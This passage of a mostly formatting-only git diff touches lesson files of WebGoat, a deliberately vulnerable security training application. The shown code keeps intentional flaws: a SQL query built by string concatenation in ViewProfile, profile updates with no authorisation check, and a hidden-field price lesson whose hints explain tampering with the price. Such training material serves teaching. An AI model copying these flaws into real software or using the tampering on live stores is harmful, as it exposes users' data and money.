-    public String getNextPage(WebSession s)
-    {
-	return GoatHillsFinancial.SEARCHSTAFF_ACTION;
-    }
+	public String getNextPage(WebSession s)
+	{
+		return GoatHillsFinancial.SEARCHSTAFF_ACTION;
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
index 487ef3180..c4f0e3bbf 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.session.Employee;
 import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.UnauthenticatedException;
@@ -12,236 +12,205 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class UpdateProfile extends DefaultLessonAction
 {
 
-    private LessonAction chainedAction;
+	private LessonAction chainedAction;
 
-    public UpdateProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName, LessonAction chainedAction)
-    {
-	super(lesson, lessonName, actionName);
-	this.chainedAction = chainedAction;
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException,
-	    ValidationException
-    {
-	if (isAuthenticated(s))
+	public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + GoatHillsFinancial.USER_ID);
-
-	    int subjectId = s.getParser().getIntParameter(
-		    GoatHillsFinancial.EMPLOYEE_ID, 0);
-
-	    String firstName = s.getParser().getStringParameter(
-		    GoatHillsFinancial.FIRST_NAME);
-	    String lastName = s.getParser().getStringParameter(
-		    GoatHillsFinancial.LAST_NAME);
-	    String ssn = s.getParser().getStringParameter(
-		    GoatHillsFinancial.SSN);
-	    String title = s.getParser().getStringParameter(
-		    GoatHillsFinancial.TITLE);
-	    String phone = s.getParser().getStringParameter(
-		    GoatHillsFinancial.PHONE_NUMBER);
-	    String address1 = s.getParser().getStringParameter(
-		    GoatHillsFinancial.ADDRESS1);
-	    String address2 = s.getParser().getStringParameter(
-		    GoatHillsFinancial.ADDRESS2);
-	    int manager = s.getParser().getIntParameter(
-		    GoatHillsFinancial.MANAGER);
-	    String startDate = s.getParser().getStringParameter(
-		    GoatHillsFinancial.START_DATE);
-	    int salary = s.getParser().getIntParameter(
-		    GoatHillsFinancial.SALARY);
-	    String ccn = s.getParser().getStringParameter(
-		    GoatHillsFinancial.CCN);
-	    int ccnLimit = s.getParser().getIntParameter(
-		    GoatHillsFinancial.CCN_LIMIT);
-	    String disciplinaryActionDate = s.getParser().getStringParameter(
-		    GoatHillsFinancial.DISCIPLINARY_DATE);
-	    String disciplinaryActionNotes = s.getParser().getStringParameter(
-		    GoatHillsFinancial.DISCIPLINARY_NOTES);
-	    String personalDescription = s.getParser().getStringParameter(
-		    GoatHillsFinancial.DESCRIPTION);
-
-	    Employee employee = new Employee(subjectId, firstName, lastName,
-		    ssn, title, phone, address1, address2, manager, startDate,
-		    salary, ccn, ccnLimit, disciplinaryActionDate,
-		    disciplinaryActionNotes, personalDescription);
-
-	    if (subjectId > 0)
-	    {
-		this.changeEmployeeProfile(s, userId, subjectId, employee);
-		setRequestAttribute(s, getLessonName() + "."
-			+ GoatHillsFinancial.EMPLOYEE_ID, Integer
-			.toString(subjectId));
-	    }
-	    else
-		this.createEmployeeProfile(s, userId, employee);
-
-	    try
-	    {
-		chainedAction.handleRequest(s);
-	    }
-	    catch (UnauthenticatedException ue1)
-	    {
-		System.out.println("Internal server error");
-		ue1.printStackTrace();
-	    }
-	    catch (UnauthorizedException ue2)
-	    {
-		System.out.println("Internal server error");
-		ue2.printStackTrace();
-	    }
+		super(lesson, lessonName, actionName);
+		this.chainedAction = chainedAction;
 	}
-	else
-	    throw new UnauthenticatedException();
-    }
 
-    public String getNextPage(WebSession s)
-    {
-	return GoatHillsFinancial.VIEWPROFILE_ACTION;
-    }
-
-    public void changeEmployeeProfile(WebSession s, int userId, int subjectId,
-	    Employee employee) throws UnauthorizedException
-    {
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException, ValidationException
 	{
-	    // Note: The password field is ONLY set by ChangePassword
-		String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
-			+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
-			+ " personal_description = ? WHERE userid = ?;";
-	    try
-	    {
-			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+		if (isAuthenticated(s))
+		{
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
 
-			ps.setString(1, employee.getFirstName());
-			ps.setString(2, employee.getLastName());
-			ps.setString(3, employee.getSsn());
-			ps.setString(4, employee.getTitle());
-			ps.setString(5, employee.getPhoneNumber());
-			ps.setString(6, employee.getAddress1());
-			ps.setString(7, employee.getAddress2());
-			ps.setInt(8, employee.getManager());
-			ps.setString(9, employee.getStartDate());
-			ps.setString(10, employee.getCcn());
-			ps.setInt(11, employee.getCcnLimit());
-			ps.setString(12, employee.getPersonalDescription());
-			ps.setInt(13, subjectId);
-			ps.execute();
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error updating employee profile");
-		sqle.printStackTrace();
-	    }
+			int subjectId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID, 0);
 
+			String firstName = s.getParser().getStringParameter(GoatHillsFinancial.FIRST_NAME);
+			String lastName = s.getParser().getStringParameter(GoatHillsFinancial.LAST_NAME);
+			String ssn = s.getParser().getStringParameter(GoatHillsFinancial.SSN);
+			String title = s.getParser().getStringParameter(GoatHillsFinancial.TITLE);
+			String phone = s.getParser().getStringParameter(GoatHillsFinancial.PHONE_NUMBER);
+			String address1 = s.getParser().getStringParameter(GoatHillsFinancial.ADDRESS1);
+			String address2 = s.getParser().getStringParameter(GoatHillsFinancial.ADDRESS2);
+			int manager = s.getParser().getIntParameter(GoatHillsFinancial.MANAGER);
+			String startDate = s.getParser().getStringParameter(GoatHillsFinancial.START_DATE);
+			int salary = s.getParser().getIntParameter(GoatHillsFinancial.SALARY);
+			String ccn = s.getParser().getStringParameter(GoatHillsFinancial.CCN);
+			int ccnLimit = s.getParser().getIntParameter(GoatHillsFinancial.CCN_LIMIT);
+			String disciplinaryActionDate = s.getParser().getStringParameter(GoatHillsFinancial.DISCIPLINARY_DATE);
+			String disciplinaryActionNotes = s.getParser().getStringParameter(GoatHillsFinancial.DISCIPLINARY_NOTES);
+			String personalDescription = s.getParser().getStringParameter(GoatHillsFinancial.DESCRIPTION);
+
+			Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
+					manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
+					personalDescription);
+
+			if (subjectId > 0)
+			{
+				this.changeEmployeeProfile(s, userId, subjectId, employee);
+				setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer
+						.toString(subjectId));
+			}
+			else
+				this.createEmployeeProfile(s, userId, employee);
+
+			try
+			{
+				chainedAction.handleRequest(s);
+			} catch (UnauthenticatedException ue1)
+			{
+				System.out.println("Internal server error");
+				ue1.printStackTrace();
+			} catch (UnauthorizedException ue2)
+			{
+				System.out.println("Internal server error");
+				ue2.printStackTrace();
+			}
+		}
+		else
+			throw new UnauthenticatedException();
 	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error updating employee profile");
-	    e.printStackTrace();
-	}
-    }
 
-    private int getNextUID(WebSession s)
-    {
-	int uid = -1;
-	try
+	public String getNextPage(WebSession s)
 	{
-	    Statement statement = WebSession.getConnection(s).createStatement(
-		    ResultSet.TYPE_SCROLL_INSENSITIVE,
-		    ResultSet.CONCUR_READ_ONLY);
-	    ResultSet results = statement
-		    .executeQuery("select max(userid) as uid from employee");
-	    results.first();
-	    uid = results.getInt("uid");
+		return GoatHillsFinancial.VIEWPROFILE_ACTION;
 	}
-	catch (SQLException sqle)
-	{
-	    sqle.printStackTrace();
-	    s.setMessage("Error updating employee profile");
-	}
-	catch (ClassNotFoundException e)
-	{
-	    // TODO Auto-generated catch block
-	    e.printStackTrace();
-	}
-	return uid + 1;
-    }
 
-    public void createEmployeeProfile(WebSession s, int userId,
-	    Employee employee) throws UnauthorizedException
-    {
-	try
+	public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee)
+			throws UnauthorizedException
 	{
+		try
+		{
+			// Note: The password field is ONLY set by ChangePassword
+			String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
+					+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
+					+ " personal_description = ? WHERE userid = ?;";
+			try
+			{
+				PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query,
+																					ResultSet.TYPE_SCROLL_INSENSITIVE,
+																					ResultSet.CONCUR_READ_ONLY);
+
+				ps.setString(1, employee.getFirstName());
+				ps.setString(2, employee.getLastName());
+				ps.setString(3, employee.getSsn());
+				ps.setString(4, employee.getTitle());
+				ps.setString(5, employee.getPhoneNumber());
+				ps.setString(6, employee.getAddress1());
+				ps.setString(7, employee.getAddress2());
+				ps.setInt(8, employee.getManager());
+				ps.setString(9, employee.getStartDate());
+				ps.setString(10, employee.getCcn());
+				ps.setInt(11, employee.getCcnLimit());
+				ps.setString(12, employee.getPersonalDescription());
+				ps.setInt(13, subjectId);
+				ps.execute();
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error updating employee profile");
+				sqle.printStackTrace();
+			}
+
+		} catch (Exception e)
+		{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+		}
+	}
+
+	private int getNextUID(WebSession s)
+	{
+		int uid = -1;
+		try
+		{
+			Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																				ResultSet.CONCUR_READ_ONLY);
+			ResultSet results = statement.executeQuery("select max(userid) as uid from employee");
+			results.first();
+			uid = results.getInt("uid");
+		} catch (SQLException sqle)
+		{
+			sqle.printStackTrace();
+			s.setMessage("Error updating employee profile");
+		} catch (ClassNotFoundException e)
+		{
+			// TODO Auto-generated catch block
+			e.printStackTrace();
+		}
+		return uid + 1;
+	}
+
+	public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException
+	{
+		try
+		{
 			int nextId = getNextUID(s);
-		    String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+			String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
 
-	    try
-	    {
-    			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
+			try
+			{
+				PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
 
-    			ps.setString(1, employee.getFirstName().toLowerCase());
-    			ps.setString(2, employee.getLastName());
-    			ps.setString(3, employee.getSsn());
-    			ps.setString(4, employee.getTitle());
-    			ps.setString(5, employee.getPhoneNumber());
-    			ps.setString(6, employee.getAddress1());
-    			ps.setString(7, employee.getAddress2());
-    			ps.setInt(8, employee.getManager());
-    			ps.setString(9, employee.getStartDate());
-    			ps.setString(10, employee.getCcn());
-    			ps.setInt(11, employee.getCcnLimit());
-    			ps.setString(12, employee.getDisciplinaryActionDate());
-    			ps.setString(13, employee.getDisciplinaryActionNotes());
-    			ps.setString(14, employee.getPersonalDescription());
+				ps.setString(1, employee.getFirstName().toLowerCase());
+				ps.setString(2, employee.getLastName());
+				ps.setString(3, employee.getSsn());
+				ps.setString(4, employee.getTitle());
+				ps.setString(5, employee.getPhoneNumber());
+				ps.setString(6, employee.getAddress1());
+				ps.setString(7, employee.getAddress2());
+				ps.setInt(8, employee.getManager());
+				ps.setString(9, employee.getStartDate());
+				ps.setString(10, employee.getCcn());
+				ps.setInt(11, employee.getCcnLimit());
+				ps.setString(12, employee.getDisciplinaryActionDate());
+				ps.setString(13, employee.getDisciplinaryActionNotes());
+				ps.setString(14, employee.getPersonalDescription());
 
-    			ps.execute();
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error updating employee profile");
-		sqle.printStackTrace();
-	    }
+				ps.execute();
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error updating employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error updating employee profile");
+			e.printStackTrace();
+		}
 	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error updating employee profile");
-    	    e.printStackTrace();
-	}
-    }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
index baae6aa7a..9a79405db 100755
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
@@ -1,146 +1,124 @@
+
 package org.owasp.webgoat.lessons.GoatHillsFinancial;
 
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.session.Employee;
 import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.UnauthenticatedException;
 import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class ViewProfile extends DefaultLessonAction
 {
 
-    public ViewProfile(GoatHillsFinancial lesson, String lessonName,
-	    String actionName)
-    {
-	super(lesson, lessonName, actionName);
-    }
-
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException,
-	    UnauthenticatedException, UnauthorizedException
-    {
-	getLesson().setCurrentAction(s, getActionName());
-
-	if (isAuthenticated(s))
+	public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
 	{
-	    int userId = getIntSessionAttribute(s, getLessonName() + "."
-		    + GoatHillsFinancial.USER_ID);
-	    int employeeId = -1;
-	    try
-	    {
-		// User selected employee
-		employeeId = s.getParser().getIntParameter(
-			GoatHillsFinancial.EMPLOYEE_ID);
-	    }
-	    catch (ParameterNotFoundException e)
-	    {
-		// May be an internally selected employee
-		employeeId = getIntRequestAttribute(s, getLessonName() + "."
-			+ GoatHillsFinancial.EMPLOYEE_ID);
-	    }
-
-	    Employee employee = getEmployeeProfile(s, userId, employeeId);
-	    setSessionAttribute(s, getLessonName() + "."
-		    + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		super(lesson, lessonName, actionName);
 	}
-	else
-	    throw new UnauthenticatedException();
 
-    }
-
-    public String getNextPage(WebSession s)
-    {
-	return GoatHillsFinancial.VIEWPROFILE_ACTION;
-    }
-
-
-    protected Employee getEmployeeProfile(WebSession s, int userId,
-	    int subjectUserId) throws UnauthorizedException
-    {
-	Employee profile = null;
-
-	// Query the database for the profile data of the given employee
-	try
+	public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
+			UnauthorizedException
 	{
-	    String query = "SELECT * FROM employee WHERE userid = "
-		    + subjectUserId;
+		getLesson().setCurrentAction(s, getActionName());
 
-	    try
-	    {
-		Statement answer_statement = WebSession.getConnection(s)
-			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-				ResultSet.CONCUR_READ_ONLY);
-		ResultSet answer_results = answer_statement.executeQuery(query);
-		if (answer_results.next())
+		if (isAuthenticated(s))
 		{
-		    // Note: Do NOT get the password field.
-		    profile = new Employee(answer_results.getInt("userid"),
-			    answer_results.getString("first_name"),
-			    answer_results.getString("last_name"),
-			    answer_results.getString("ssn"), answer_results
-				    .getString("title"), answer_results
-				    .getString("phone"), answer_results
-				    .getString("address1"), answer_results
-				    .getString("address2"), answer_results
-				    .getInt("manager"), answer_results
-				    .getString("start_date"), answer_results
-				    .getInt("salary"), answer_results
-				    .getString("ccn"), answer_results
-				    .getInt("ccn_limit"), answer_results
-				    .getString("disciplined_date"),
-			    answer_results.getString("disciplined_notes"),
-			    answer_results.getString("personal_description"));
-		    /*					System.out.println("Retrieved employee from db: " + 
-		     profile.getFirstName() + " " + profile.getLastName() + 
-		     " (" + profile.getId() + ")");
-		     */}
-	    }
-	    catch (SQLException sqle)
-	    {
-		s.setMessage("Error getting employee profile");
-		sqle.printStackTrace();
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error getting employee profile");
-	    e.printStackTrace();
+			int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID);
+			int employeeId = -1;
+			try
+			{
+				// User selected employee
+				employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID);
+			} catch (ParameterNotFoundException e)
+			{
+				// May be an internally selected employee
+				employeeId = getIntRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID);
+			}
+
+			Employee employee = getEmployeeProfile(s, userId, employeeId);
+			setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee);
+		}
+		else
+			throw new UnauthenticatedException();
+
 	}
 
-	return profile;
-    }
+	public String getNextPage(WebSession s)
+	{
+		return GoatHillsFinancial.VIEWPROFILE_ACTION;
+	}
+
+	protected Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
+	{
+		Employee profile = null;
+
+		// Query the database for the profile data of the given employee
+		try
+		{
+			String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
+
+			try
+			{
+				Statement answer_statement = WebSession.getConnection(s)
+						.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+				ResultSet answer_results = answer_statement.executeQuery(query);
+				if (answer_results.next())
+				{
+					// Note: Do NOT get the password field.
+					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
+							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
+									.getString("title"), answer_results.getString("phone"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
+									.getInt("manager"), answer_results.getString("start_date"), answer_results
+									.getInt("salary"), answer_results.getString("ccn"), answer_results
+									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
+									.getString("disciplined_notes"), answer_results.getString("personal_description"));
+					/*
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 */}
+			} catch (SQLException sqle)
+			{
+				s.setMessage("Error getting employee profile");
+				sqle.printStackTrace();
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error getting employee profile");
+			e.printStackTrace();
+		}
+
+		return profile;
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
index 8d11272b3..e300434d9 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HiddenFieldTampering.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
 import java.util.regex.Pattern;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -22,46 +22,44 @@ import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
  * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
  * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
  * @created October 28, 2003
-*/
+ */
 public class HiddenFieldTampering extends LessonAdapter
 {
-	public final static A ASPECT_LOGO =
-			new A().setHref("http://www.aspectsecurity.com").addElement(
-																		new IMG("images/logos/aspect.jpg")
-																				.setAlt("Aspect Security").setBorder(0)
-																				.setHspace(0).setVspace(0));
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
 	private final static String PRICE = "Price";
 
@@ -69,14 +67,14 @@ public class HiddenFieldTampering extends LessonAdapter
 
 	private final static String PRICE_TV_HACKED = "9.99";
 
-	String regex = "^" + PRICE_TV + "$";   // obviously the "." will match any char - any interesting exploit!
+	String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any
+											// interesting exploit!
 	Pattern pattern1 = Pattern.compile(regex);
 	String lineSep = System.getProperty("line.separator");
-	String script =
-			"<SCRIPT>"  + lineSep + "regex=/" + regex + "/;" + "function validate() { " + lineSep
-					+ "if (!regex.test(document.form." + PRICE + ".value)) {alert('Data tampering is disallowed'); "
-					+" document.form." + PRICE + ".value = " + PRICE_TV + ";}"
-					+ lineSep + "else document.form.submit();" + lineSep + "} " + lineSep + "</SCRIPT>" + lineSep;
+	String script = "<SCRIPT>" + lineSep + "regex=/" + regex + "/;" + "function validate() { " + lineSep
+			+ "if (!regex.test(document.form." + PRICE + ".value)) {alert('Data tampering is disallowed'); "
+			+ " document.form." + PRICE + ".value = " + PRICE_TV + ";}" + lineSep + "else document.form.submit();"
+			+ lineSep + "} " + lineSep + "</SCRIPT>" + lineSep;
 
 	/**
 	 * Constructor for the HiddenFieldScreen object
@@ -104,8 +102,7 @@ public class HiddenFieldTampering extends LessonAdapter
 			price = s.getParser().getRawParameter(PRICE, PRICE_TV);
 			quantity = s.getParser().getFloatParameter("QTY", 1.0f);
 			total = quantity * Float.parseFloat(price);
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			s.setMessage("Invaild data " + this.getClass().getName());
 			price = PRICE_TV;
@@ -162,7 +159,8 @@ public class HiddenFieldTampering extends LessonAdapter
 			ec.addElement(input);
 			ec.addElement(new BR());
 
-		} else
+		}
+		else
 		{
 			if (!price.toString().equals(PRICE_TV))
 			{
@@ -200,7 +198,7 @@ public class HiddenFieldTampering extends LessonAdapter
 		hints.add("Use a program to intercept and change the value in the hidden field.");
 		hints
 				.add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from "
-					 + PRICE_TV + " to " + PRICE_TV_HACKED + ".");
+						+ PRICE_TV + " to " + PRICE_TV_HACKED + ".");
 
 		return hints;
 	}
@@ -212,8 +210,7 @@ public class HiddenFieldTampering extends LessonAdapter
 	 */
 	public String getInstructions(WebSession s)
 	{
-		String instructions =
-				"Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
+		String instructions = "Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
 
 		return (instructions);
 	}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/HtmlClues.java b/main/project/JavaSource/org/owasp/webgoat/lessons/HtmlClues.java
index a18af7a8f..c41d374e4 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/HtmlClues.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/HtmlClues.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -17,244 +17,234 @@ import org.apache.ecs.html.TD;
 import org.apache.ecs.html.TH;
 import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
-
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
